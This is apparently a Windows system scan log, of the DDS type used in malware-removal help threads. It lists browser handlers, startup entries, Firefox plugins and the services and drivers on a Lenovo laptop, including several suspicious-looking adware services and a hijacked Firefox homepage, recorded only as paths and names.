TCP: Interfaces\{98bff00c-bb80-4b13-9b96-7b50f97f6435} : DHCPNameServer = 75.75.75.75 75.75.76.76
Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
LSA: Notification Packages = scecli C:\Program Files\ThinkPad\Bluetooth Software\BtwProximityCP.dll C:\Program Files\ThinkVantage Fingerprint Software\psqlpwd.dll
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
mASetup: {A6EADE66-0000-0000-484E-7E8A45000000} - "C:\WINDOWS\SysWOW64\Rundll32.exe" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\AiodLite.dll",CreateReaderUserSettings
CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
x64-BHO: Kaspersky Protection: {2E38825B-8815-42CF-9126-C58BC28D4591} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 17.0.0\x64\IEExt\ie_plugin.dll
x64-BHO: Symantec VIP Access Add-On: {C63CD127-A1CB-4D49-A4F7-D6F88A917BE6} - C:\Program Files (x86)\Symantec\VIP Access Client\64bit\VIPAddOnForIE64.dll
x64-BHO: {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - <orphaned>
x64-TB: Kaspersky Protection Toolbar: {093F479D-712E-46CD-9E06-62E734A05F68} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 17.0.0\x64\IEExt\ie_plugin.dll
x64-Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
x64-Run: [RtHDVBg_Dolby] C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe /FORPCEE4
x64-Run: [IgfxTray] C:\WINDOWS\System32\igfxtray.exe
x64-Run: [TpShocks] TpShocks.exe
x64-Run: [LENOVO.TPKNRRES] C:\Program Files\Lenovo\Communications Utility\TPKNRRES.exe
x64-Run: [EmsService] EmsServiceHelper.exe
x64-Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
x64-mPolicies-Explorer: NoDriveTypeAutoRun = dword:60
x64-mPolicies-System: DSCAutomationHostEnabled = dword:2
x64-mPolicies-System: HideFastUserSwitching = dword:1
x64-IE: {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - <orphaned>
x64-Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: psfus - C:\Program Files\ThinkVantage Fingerprint Software\psqlpwd.dll
x64-SSODL: WebCheck - <orphaned>
x64-mASetup: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - /UserInstall
x64-mASetup: {89820200-ECBD-11cf-8B85-00AA005B4340} - U
x64-CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\poyyzgho.default-1474588217013\
FF - prefs.js: browser.startup.homepage - C:\\ProgramData\\Zaamlas\\ff.HP
FF - plugin: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll
FF - plugin: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\4.0.50401.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
FF - plugin: C:\Users\King\AppData\Roaming\Mozilla\plugins\npatgpc.dll
FF - plugin: C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_11_8_800_168.dll
FF - plugin: C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_24_0_0_186.dll
.
============= SERVICES / DRIVERS ===============
.
R0 cm_km;AO Kaspersky Lab Cryptographic Module x64 (56 bit);C:\WINDOWS\System32\drivers\cm_km.sys [2016-6-10 238936]
R0 CmgPCS;Credant PCS;C:\WINDOWS\System32\drivers\CmgPCS.sys [2013-5-10 144168]
R0 CmgShieldCEF;CmgShieldCEF;C:\WINDOWS\System32\drivers\CMGShCEF.sys [2013-5-10 381224]
R0 intelpep;Intel(R) Power Engine Plug-in Driver;C:\WINDOWS\System32\drivers\intelpep.sys [2016-7-16 48152]
R0 iorate;iorate;C:\WINDOWS\System32\drivers\iorate.sys [2016-11-9 48992]
R0 iusb3hcs;Intel(R) USB 3.0 Host Controller Switch Driver;C:\WINDOWS\System32\drivers\iusb3hcs.sys [2013-7-5 16152]
R0 klbackupdisk;Kaspersky Lab klbackupdisk;C:\WINDOWS\System32\drivers\klbackupdisk.sys [2016-6-7 63920]
R0 klupd_klif_arkmon;klupd_klif_arkmon;C:\WINDOWS\System32\drivers\klupd_klif_arkmon.sys [2016-12-8 218920]
R0 klupd_klif_klbg;klupd_klif_klbg;C:\WINDOWS\System32\drivers\klupd_klif_klbg.sys [2016-12-8 104720]
R0 TPDIGIMN;TPDIGIMN;C:\WINDOWS\System32\drivers\ApsHM64.sys [2011-12-29 25416]
R0 volume;Volume driver;C:\WINDOWS\System32\drivers\volume.sys [2016-7-16 16224]
R0 WindowsTrustedRT;Windows Trusted Execution Environment Class Extension;C:\WINDOWS\System32\drivers\WindowsTrustedRT.sys [2016-7-16 107032]
R0 WindowsTrustedRTProxy;Microsoft Windows Trusted Runtime Secure Service;C:\WINDOWS\System32\drivers\WindowsTrustedRTProxy.sys [2016-7-16 17944]
R0 Wof;Windows Overlay File System Filter Driver;C:\WINDOWS\System32\drivers\wof.sys [2016-9-13 199008]
R1 ahcache;Application Compatibility Cache;C:\WINDOWS\System32\drivers\ahcache.sys [2016-10-28 227328]
R1 eamonm;eamonm;C:\WINDOWS\System32\drivers\eamonm.sys [2013-9-17 239320]
R1 EpfwLWF;Epfw NDIS LightWeight Filter;C:\WINDOWS\System32\drivers\EpfwLWF.sys [2013-9-17 44120]
R1 FileCrypt;FileCrypt;C:\WINDOWS\System32\drivers\filecrypt.sys [2016-7-16 88576]
R1 GpuEnergyDrv;GPU Energy Driver;C:\WINDOWS\System32\drivers\gpuenergydrv.sys [2016-7-16 8192]
R1 klbackupflt;Kaspersky Lab klbackupflt;C:\WINDOWS\System32\drivers\klbackupflt.sys [2016-6-14 86352]
R1 klhk;Kaspersky Lab service driver;C:\WINDOWS\System32\drivers\klhk.sys [2016-6-20 435032]
R1 KLIM6;Kaspersky Anti-Virus NDIS 6 Filter;C:\WINDOWS\System32\drivers\klim6.sys [2016-6-20 57424]
R1 klpd;Kaspersky Lab format recognizer driver;C:\WINDOWS\System32\drivers\klpd.sys [2016-5-31 45488]
R1 klwfp;klwfp;C:\WINDOWS\System32\drivers\klwfp.sys [2016-6-18 85320]
R1 Klwtp;KLwtp - WFP callout traffic inspector;C:\WINDOWS\System32\drivers\klwtp.sys [2016-6-2 134880]
R1 kneps;kneps;C:\WINDOWS\System32\drivers\kneps.sys [2016-6-14 194480]
R1 NetUtils2016;NetUtils2016;C:\WINDOWS\System32\drivers\NetUtils2016.sys [2017-1-7 909944]
R2 Apple Mobile Device Service;Apple Mobile Device Service;C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [2016-9-22 83768]
R2 AVP17.0.0;Kaspersky Anti-Virus Service 17.0.0;C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 17.0.0\avp.exe [2016-6-28 241544]
R2 backlh;Background Logic Handler;C:\ProgramData\Logic Handler\set.exe [2017-1-7 3786752]
R2 BcmBtRSupport;Bluetooth Driver Management Service;C:\WINDOWS\System32\BtwRSupportService.exe [2015-3-27 2251992]
R2 CDPSvc;Connected Devices Platform Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
R2 CDPUserSvc_87960;CDPUserSvc_87960;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R2 clreg;Virtual Registry for Containers;C:\WINDOWS\System32\drivers\registry.sys [2016-7-16 70144]
R2 CoreMessagingRegistrar;CoreMessaging;C:\WINDOWS\System32\svchost.exe -k LocalServiceNoNetwork [2016-7-16 44496]
R2 DbxSvc;DbxSvc;C:\WINDOWS\System32\DbxSvc.exe [2016-12-21 42096]
R2 DiagTrack;Connected User Experiences and Telemetry;C:\WINDOWS\System32\svchost.exe -k utcsvc [2016-7-16 44496]
R2 DoSvc;Delivery Optimization;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R2 EMS;EMS;EMSService.exe --> EMSService.exe [?]
R2 HPSupportSolutionsFrameworkService;HP Support Solutions Framework Service;C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [2015-12-20 26168]
R2 igfxCUIService1.0.0.0;Intel(R) HD Graphics Control Panel Service;C:\WINDOWS\System32\igfxCUIService.exe [2016-5-3 337888]
R2 Intel(R) Capability Licensing Service Interface;Intel(R) Capability Licensing Service Interface;C:\Program Files\Intel\iCLS Client\HeciServer.exe [2012-2-3 628448]
R2 IntuitUpdateServiceV4;Intuit Update Service v4;C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe [2016-9-7 21216]
R2 jhi_service;Intel(R) Dynamic Application Loader Host Interface Service;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe [2013-7-5 161560]
R2 kldisk;kldisk;C:\WINDOWS\System32\drivers\kldisk.sys [2016-5-31 78216]
R2 KSDE1.0.0;Kaspersky Secure Connection Service 1.0.0;C:\Program Files (x86)\Kaspersky Lab\Kaspersky Secure Connection 1.0\ksde.exe [2016-6-28 241544]
R2 LENOVO.CAMMUTE;Lenovo Camera Mute;C:\Program Files\Lenovo\Communications Utility\CamMute.exe [2013-7-5 58224]
R2 LENOVO.MICMUTE;Lenovo Microphone Mute;C:\Program Files\Lenovo\HOTKEY\micmute.exe [2012-5-8 101736]
R2 LENOVO.TPKNRSVC;Lenovo Keyboard Noise Reduction;C:\Program Files\Lenovo\Communications Utility\TPKNRSVC.exe [2013-7-5 61296]
R2 LENOVO.TVTVCAM;ThinkVantage Virtual Camera Controller;C:\Program Files\Lenovo\Communications Utility\vcamsvc.exe [2013-7-5 179568]
R2 Lenovo.VIRTSCRLSVC;Lenovo Auto Scroll;C:\Program Files\Lenovo\VIRTSCRL\lvvsst.exe [2012-5-8 133992]
R2 Nettrans;Network Packet Manitor;C:\ProgramData\NetworkPacketManitor\Nettrans.exe [2017-1-7 43520]
R2 NetUtils2016srv;NetUtils2016srv;C:\WINDOWS\System32\NetUtils2016.exe --> C:\WINDOWS\System32\NetUtils2016.exe [?]
R2 nlsX86cc;Nalpeiron Licensing Service;C:\Windows\SysWOW64\NLSSRV32.EXE [2016-3-3 71832]
R2 OneSyncSvc_87960;Sync Host_87960;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R2 qevisufy;Space Subscript;C:\Program Files (x86)\4baf5696-ef63-4372-a50c-30bd8cd532291483831172\knsCFBC.tmp [2017-1-8 404480]
R2 Seagate Dashboard Services;Seagate Dashboard Services;C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.DASWindowsService.exe [2015-2-13 16216]
R2 Seagate MobileBackup Service;Seagate MobileBackup Service;C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\MobileService.exe [2015-4-1 157992]
R2 storqosflt;Storage QoS Filter Driver;C:\WINDOWS\System32\drivers\storqosflt.sys [2016-7-16 78336]
R2 SW2SVC;SecureW2 Service;C:\Program Files (x86)\SecureW2\sw2_service.exe [2012-11-2 106920]
R2 SynTPEnhService;SynTPEnh Caller Service;C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [2016-4-21 259176]
R2 tiledatamodelsvc;Tile Data model server;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
R2 TPHKLOAD;Lenovo Hotkey Client Loader;C:\Program Files\Lenovo\HOTKEY\tphkload.exe [2012-5-8 145256]
R2 TPHKSVC;On Screen Display;C:\Program Files\Lenovo\HOTKEY\TPHKSVC.exe [2012-5-8 144960]
R2 UNS;Intel(R) Management and Security Application User Notification Service;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe [2013-7-5 363800]
R2 UserManager;User Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R2 VIPAppService;VIPAppService;C:\Program Files (x86)\Symantec\VIP Access Client\VIPAppService.exe [2012-4-19 84080]
R2 wcifs;Windows Container Isolation;C:\WINDOWS\System32\drivers\wcifs.sys [2016-10-1 119648]
R2 wcnfs;Windows Container Name Virtualization;C:\WINDOWS\System32\drivers\wcnfs.sys [2016-7-16 66560]
R2 WDDriveService;WD Drive Manager;C:\Program Files (x86)\Western Digital\WD Drive Manager\WDDriveService.exe [2015-12-7 308088]
R2 WpnService;Windows Push Notifications System Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
R3 5U877;5U877;C:\WINDOWS\System32\drivers\5U877.sys [2013-7-5 216704]
R3 AppXSvc;AppX Deployment Service (AppXSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2016-7-16 44496]
R3 bcbtums;Bluetooth RAM Firmware Download USB Filter;C:\WINDOWS\System32\drivers\bcbtums.sys [2015-3-27 173312]
R3 BthLEEnum;Bluetooth Low Energy Driver;C:\WINDOWS\System32\drivers\BthLEEnum.sys [2016-10-1 249856]
R3 ClipSVC;Client License Service (ClipSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2016-7-16 44496]
R3 IntcDAud;Intel(R) Display Audio;C:\WINDOWS\System32\drivers\IntcDAud.sys [2013-7-5 331264]
R3 iwdbus;IWD Bus Enumerator;C:\WINDOWS\System32\drivers\iwdbus.sys [2015-12-1 38896]
R3 klflt;Kaspersky Lab Kernel DLL;C:\WINDOWS\System32\drivers\klflt.sys [2016-8-10 191312]
R3 klids;klids;C:\ProgramData\Kaspersky Lab\AVP17.0.0\Bases\klids.sys [2016-8-10 182360]
R3 klkbdflt;Kaspersky Lab KLKBDFLT;C:\WINDOWS\System32\drivers\klkbdflt.sys [2016-5-18 52136]
R3 klmouflt;Kaspersky Lab KLMOUFLT;C:\WINDOWS\System32\drivers\klmouflt.sys [2015-6-7 41656]
R3 kltap;Kaspersky Security Data Escort Adapter;C:\WINDOWS\System32\drivers\kltap.sys [2016-6-7 52152]
R3 klupd_klif_kimul;klupd_klif_kimul;C:\WINDOWS\System32\drivers\klupd_klif_kimul.sys [2016-12-15 85984]
R3 klupd_klif_klark;klupd_klif_klark;C:\WINDOWS\System32\drivers\klupd_klif_klark.sys [2016-12-8 245512]
R3 klupd_klif_mark;klupd_klif_mark;C:\WINDOWS\System32\drivers\klupd_klif_mark.sys [2016-12-8 164888]
R3 LicenseManager;Windows License Manager Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
R3 NcbService;Network Connection Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
R3 NdisVirtualBus;Microsoft Virtual Network Adapter Enumerator;C:\WINDOWS\System32\drivers\NdisVirtualBus.sys [2016-7-16 20480]
R3 NETwNe64;___ Intel(R) Wireless WiFi Link 5000 Series Adapter Driver for Windows 8 - 64 Bit;C:\WINDOWS\System32\drivers\NETwew01.sys [2016-7-16 3343872]
R3 PimIndexMaintenanceSvc_87960;Contact Data_87960;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R3 risdxc;risdxc;C:\WINDOWS\System32\drivers\risdxc64.sys [2013-7-5 106496]
R3 StateRepository;State Repository Service;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
R3 TimeBrokerSvc;Time Broker;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
R3 Tvti2c;Lenovo SM bus driver;C:\WINDOWS\System32\drivers\tvti2c.sys [2012-2-7 40248]
R3 tvtvcamd;ThinkVantage Virtual Camera;C:\WINDOWS\System32\drivers\tvtvcamd.sys [2013-7-5 27432]
R3 UnistoreSvc_87960;User Data Storage_87960;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R3 UserDataSvc_87960;User Data Access_87960;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
R3 WSDScan;WSD Scan Support;C:\WINDOWS\System32\drivers\WSDScan.sys [2016-7-16 24576]
R3 WUDFWpdMtp;WUDFWpdMtp;C:\WINDOWS\System32\drivers\WUDFRd.sys [2016-7-16 216064]
S0 klelam;klelam;C:\WINDOWS\System32\drivers\klelam.sys [2016-3-30 28792]
S2 dbupdate;Dropbox Update Service (dbupdate);C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-12-27 143144]
S2 MapsBroker;Downloaded Maps Manager;C:\WINDOWS\System32\svchost.exe -k NetworkService [2016-7-16 44496]
S3 AcpiDev;ACPI Devices driver;C:\WINDOWS\System32\drivers\AcpiDev.sys [2016-7-16 18432]
S3 ADP80XX;ADP80XX;C:\WINDOWS\System32\drivers\adp80xx.sys [2016-7-16 1135456]
S3 AJRouter;AllJoyn Router Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
S3 Apowersoft_AudioDevice;Apowersoft_AudioDevice;C:\WINDOWS\System32\drivers\Apowersoft_AudioDevice.sys [2013-10-20 31920]
S3 applockerfltr;Smartlocker Filter Driver;C:\WINDOWS\System32\drivers\applockerfltr.sys [2016-7-16 15360]
S3 AppReadiness;App Readiness;C:\WINDOWS\System32\svchost.exe -k AppReadiness [2016-7-16 44496]
S3 AppvStrm;AppvStrm;C:\WINDOWS\System32\drivers\AppVStrm.sys [2016-10-1 127328]
S3 AppvVemgr;AppvVemgr;C:\WINDOWS\System32\drivers\AppvVemgr.sys [2016-7-16 157024]
S3 AppvVfs;AppvVfs;C:\WINDOWS\System32\drivers\AppvVfs.sys [2016-7-16 141152]
S3 bcmfn;bcmfn Service;C:\WINDOWS\System32\drivers\bcmfn.sys [2016-7-16 9728]
S3 bcmfn2;bcmfn2 Service;C:\WINDOWS\System32\drivers\bcmfn2.sys [2016-7-16 9728]
S3 BthHFSrv;Bluetooth Handsfree Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceAndNoImpersonation [2016-7-16 44496]
S3 btwampfl;btwampfl;C:\WINDOWS\System32\drivers\btwampfl.sys [2015-3-27 188160]
S3 buttonconverter;Service for Portable Device Control devices;C:\WINDOWS\System32\drivers\buttonconverter.sys [2016-7-16 38912]
S3 CapImg;HID driver for CapImg touch screen;C:\WINDOWS\System32\drivers\capimg.sys [2016-10-28 118272]
S3 cht4iscsi;cht4iscsi;C:\WINDOWS\System32\drivers\cht4sx64.sys [2016-7-16 346976]
S3 cht4vbd;Chelsio Virtual Bus Driver;C:\WINDOWS\System32\drivers\cht4vx64.sys [2016-7-16 2104160]
S3 dbupdatem;Dropbox Update Service (dbupdatem);C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-12-27 143144]
S3 DcpSvc;DataCollectionPublishingService;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 DevQueryBroker;DevQuery Background Discovery Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 dg_ssudbus;SAMSUNG Mobile USB Composite Device Driver (DEVGURU Ver.);C:\WINDOWS\System32\drivers\ssudbus.sys [2016-4-24 131712]
S3 diagnosticshub.standardcollector.service;Microsoft (R) Diagnostics Hub Standard Collector Service;C:\WINDOWS\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe [2016-7-16 93184]
S3 DmEnrollmentSvc;Device Management Enrollment Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 dmwappushservice;dmwappushsvc;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 DsSvc;Data Sharing Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 embeddedmode;Embedded Mode;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 EntAppSvc;Enterprise App Management Service;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
S3 FrameServer;Windows Camera Frame Server;C:\WINDOWS\System32\svchost.exe -k Camera [2016-7-16 44496]
S3 genericusbfn;Generic USB Function Class;C:\WINDOWS\System32\drivers\genericusbfn.sys [2016-7-16 20480]
S3 hidinterrupt;Common Driver for HID Buttons implemented with interrupts;C:\WINDOWS\System32\drivers\hidinterrupt.sys [2016-7-16 50016]
S3 HvHost;HV Host Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 iagpio;Intel Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iagpio.sys [2016-7-16 33280]
S3 iai2c;Intel(R) Serial IO I2C Host Controller;C:\WINDOWS\System32\drivers\iai2c.sys [2016-7-16 81408]
S3 iaLPSS2i_GPIO2;Intel(R) Serial IO GPIO Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2.sys [2016-7-16 64512]
S3 iaLPSS2i_I2C;Intel(R) Serial IO I2C Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_I2C.sys [2016-7-16 176384]
S3 iaLPSSi_GPIO;Intel(R) Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys [2016-7-16 38128]
S3 iaLPSSi_I2C;Intel(R) Serial IO I2C Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys [2016-7-16 113152]
S3 iaStorAV;Intel(R) SATA RAID Controller Windows;C:\WINDOWS\System32\drivers\iaStorAV.sys [2016-7-16 673120]
S3 ibbus;Mellanox InfiniBand Bus/AL (Filter Driver);C:\WINDOWS\System32\drivers\ibbus.sys [2016-7-16 526176]
S3 icssvc;Windows Mobile Hotspot Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
S3 IndirectKmd;Indirect Displays Kernel-Mode Driver;C:\WINDOWS\System32\drivers\IndirectKmd.sys [2016-7-16 35840]
S3 intaud_WaveExtensible;Intel WiDi Audio Device;C:\WINDOWS\System32\drivers\intelaud.sys [2015-12-1 50160]
S3 klvssbrigde64;klvssbrigde64;C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 17.0.0\x64\vssbridge64.exe [2016-6-28 77328]
S3 lfsvc;Geolocation Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 LSCWinService;LSCWinService;C:\Program Files\Lenovo\Lenovo Solution Center\App\LSCWinService.exe [2015-12-10 272864]
S3 LSI_SAS2i;LSI_SAS2i;C:\WINDOWS\System32\drivers\lsi_sas2i.sys [2016-7-16 105824]
S3 LSI_SAS3i;LSI_SAS3i;C:\WINDOWS\System32\drivers\lsi_sas3i.sys [2016-7-16 101216]
S3 MBAMSwissArmy;MBAMSwissArmy;C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [2016-9-10 192216]
S3 megasas2i;megasas2i;C:\WINDOWS\System32\drivers\MegaSas2i.sys [2016-10-11 64352]
S3 MessagingService_87960;MessagingService_87960;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
S3 mlx4_bus;Mellanox ConnectX Bus Enumerator;C:\WINDOWS\System32\drivers\mlx4_bus.sys [2016-7-16 842584]
S3 MsSecFlt;Microsoft Security Events Component Minifilter;C:\WINDOWS\System32\drivers\mssecflt.sys [2016-7-16 179040]
S3 ndfltr;NetworkDirect Service;C:\WINDOWS\System32\drivers\ndfltr.sys [2016-7-16 108896]
S3 NetAdapterCx;Network Adapter Wdf Class Extension Library;C:\WINDOWS\System32\drivers\NetAdapterCx.sys [2016-7-16 90624]
S3 NetSetupSvc;Network Setup Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 NgcCtnrSvc;Microsoft Passport Container;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2016-7-16 44496]
S3 NgcSvc;Microsoft Passport;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 percsas2i;percsas2i;C:\WINDOWS\System32\drivers\percsas2i.sys [2016-7-16 58720]
S3 percsas3i;percsas3i;C:\WINDOWS\System32\drivers\percsas3i.sys [2016-7-16 61792]
S3 PhoneSvc;Phone Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
S3 ReFSv1;ReFSv1;C:\WINDOWS\System32\drivers\refsv1.sys [2016-7-16 928608]
S3 RetailDemo;Retail Demo Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 ScDeviceEnum;Smart Card Device Enumeration Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 scmbus;Microsoft Storage Class Memory Bus Driver;C:\WINDOWS\System32\drivers\scmbus.sys [2016-7-16 88416]
S3 scmdisk0101;Microsoft NVDIMM-N disk driver;C:\WINDOWS\System32\drivers\scmdisk0101.sys [2016-7-16 123904]
S3 Sense;Windows Defender Advanced Threat Protection Service;C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [2016-10-1 2889896]
S3 SensorDataService;Sensor Data Service;C:\WINDOWS\System32\SensorDataService.exe [2016-9-16 1312768]
S3 SensorService;Sensor Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 SerCx2;Serial UART Support Library;C:\WINDOWS\System32\drivers\SerCx2.sys [2016-7-16 151904]
S3 SmbDrvI;SmbDrvI;C:\WINDOWS\System32\drivers\Smb_driver_Intel.sys [2015-8-7 52912]
S3 smphost;Microsoft Storage Spaces SMP;C:\WINDOWS\System32\svchost.exe -k smphost [2016-7-16 44496]
S3 SmsRouter;Microsoft Windows SMS Router Service.;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 ssudmdm;SAMSUNG Mobile USB Modem Drivers (DEVGURU Ver.);C:\WINDOWS\System32\drivers\ssudmdm.sys [2016-4-24 165504]
S3 stornvme;Microsoft Standard NVM Express Driver;C:\WINDOWS\System32\drivers\stornvme.sys [2016-10-1 81760]
S3 storufs;Microsoft Universal Flash Storage (UFS) Driver;C:\WINDOWS\System32\drivers\storufs.sys [2016-7-16 32096]
S3 TieringEngineService;Storage Tiers Management;C:\WINDOWS\System32\TieringEngineService.exe [2016-7-16 287744]
S3 UcmCx0101;USB Connector Manager KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmCx.sys [2016-7-16 95744]
S3 UcmTcpciCx0101;UCM-TCPCI KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmTcpciCx.sys [2016-7-16 108544]
S3 UcmUcsi;USB Connector Manager UCSI Client;C:\WINDOWS\System32\drivers\UcmUcsi.sys [2016-7-16 50688]
S3 UdeCx;USB Device Emulation Support Library;C:\WINDOWS\System32\drivers\Udecx.sys [2016-7-16 45568]
S3 UEFI;Microsoft UEFI Driver;C:\WINDOWS\System32\drivers\uefi.sys [2016-7-16 28512]
S3 Ufx01000;USB Function Class Extension;C:\WINDOWS\System32\drivers\ufx01000.sys [2016-7-16 263008]
S3 UfxChipidea;USB Chipidea Controller;C:\WINDOWS\System32\drivers\UfxChipidea.sys [2016-7-16 96608]
S3 ufxsynopsys;USB Synopsys Controller;C:\WINDOWS\System32\drivers\ufxsynopsys.sys [2016-7-16 137056]
S3 UrsChipidea;Chipidea USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urschipidea.sys [2016-7-16 28512]
S3 UrsCx01000;USB Role-Switch Support Library;C:\WINDOWS\System32\drivers\urscx01000.sys [2016-7-16 57696]
S3 UrsSynopsys;Synopsys USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urssynopsys.sys [2016-7-16 27488]
S3 USBAAPL64;Apple Mobile USB Driver;C:\WINDOWS\System32\drivers\usbaapl64.sys [2015-6-10 54784]
S3 UsoSvc;Update Orchestrator Service for Windows Update;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 vhf;Virtual HID Framework (VHF) Driver;C:\WINDOWS\System32\drivers\vhf.sys [2016-7-16 32256]
S3 vmgid;Microsoft Hyper-V Guest Infrastructure Driver;C:\WINDOWS\System32\drivers\vmgid.sys [2016-7-16 10240]
